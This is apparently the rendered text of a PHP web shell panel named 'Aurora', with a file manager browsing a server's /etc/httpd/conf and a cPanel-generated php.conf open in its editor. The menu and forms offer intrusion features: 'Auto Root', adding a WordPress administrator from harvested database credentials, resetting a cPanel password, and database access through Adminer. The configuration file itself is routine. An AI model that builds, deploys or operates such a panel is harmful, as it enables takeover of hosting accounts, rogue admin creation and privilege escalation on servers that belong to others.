Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
etc
httpd
conf
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: php.conf
# This file was automatically generated by the Cpanel php # Configuration system. If you wish to change the way php is being # handled by Apache on your system, use the # /usr/local/cpanel/bin/rebuild_phpconf script or the WHM interface. # # Manual edits of this file will be lost when the configuration is # rebuilt. # These initial handlers serve as fallback in case there is any # time between when configuration has changed and when it takes effect. # We use CGI style since it is simple and the default we use elsewhere. # If the version is not set to CGI they will get a 404 until the new # configuration takes effect which is better than serving source # code until the new configuration takes effect. <IfModule actions_module> Action application/x-httpd-alt-php54 /cgi-sys/alt-php54 Action application/x-httpd-alt-php55 /cgi-sys/alt-php55 Action application/x-httpd-alt-php56 /cgi-sys/alt-php56 Action application/x-httpd-alt-php70 /cgi-sys/alt-php70 Action application/x-httpd-alt-php71 /cgi-sys/alt-php71 Action application/x-httpd-alt-php72 /cgi-sys/alt-php72 Action application/x-httpd-alt-php73 /cgi-sys/alt-php73 Action application/x-httpd-alt-php74 /cgi-sys/alt-php74 Action application/x-httpd-ea-php80 /cgi-sys/ea-php80 Action application/x-httpd-ea-php81 /cgi-sys/ea-php81 Action application/x-httpd-ea-php82 /cgi-sys/ea-php82 Action application/x-httpd-ea-php83 /cgi-sys/ea-php83 Action application/x-httpd-ea-php84 /cgi-sys/ea-php84 Action application/x-httpd-ea-php85 /cgi-sys/ea-php85 </IfModule> # lsapi configuration for alt-php54 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-alt-php54___lsphp .php .php5 .phtml </IfModule> # lsapi configuration for alt-php55 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-alt-php55___lsphp .php .php5 .phtml </IfModule> # lsapi configuration for alt-php56 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-alt-php56___lsphp .php .php5 .phtml </IfModule> # lsapi configuration for alt-php70 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-alt-php70___lsphp .php .php7 .phtml </IfModule> # lsapi configuration for alt-php71 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-alt-php71___lsphp .php .php7 .phtml </IfModule> # lsapi configuration for alt-php72 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-alt-php72___lsphp .php .php7 .phtml </IfModule> # lsapi configuration for alt-php73 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-alt-php73___lsphp .php .php7 .phtml </IfModule> # lsapi configuration for alt-php74 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-alt-php74___lsphp .php .php7 .phtml </IfModule> # lsapi configuration for ea-php80 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-ea-php80___lsphp .php .php8 .phtml </IfModule> # lsapi configuration for ea-php81 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-ea-php81___lsphp .php .php8 .phtml </IfModule> # lsapi configuration for ea-php82 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-ea-php82___lsphp .php .php8 .phtml </IfModule> # lsapi configuration for ea-php84 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-ea-php84___lsphp .php .php8 .phtml </IfModule> # lsapi configuration for ea-php85 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-ea-php85___lsphp .php .php8 .phtml </IfModule> # Set ea-php83 as the system default for php <IfModule mime_module> AddHandler application/x-httpd-ea-php83___lsphp .php .php8 .phtml </IfModule> # lsapi configuration for ea-php83 <IfModule lsapi_module> lsapi_engine On AddHandler application/x-httpd-ea-php83___lsphp .php .php8 .phtml </IfModule> # End of autogenerated php configuration.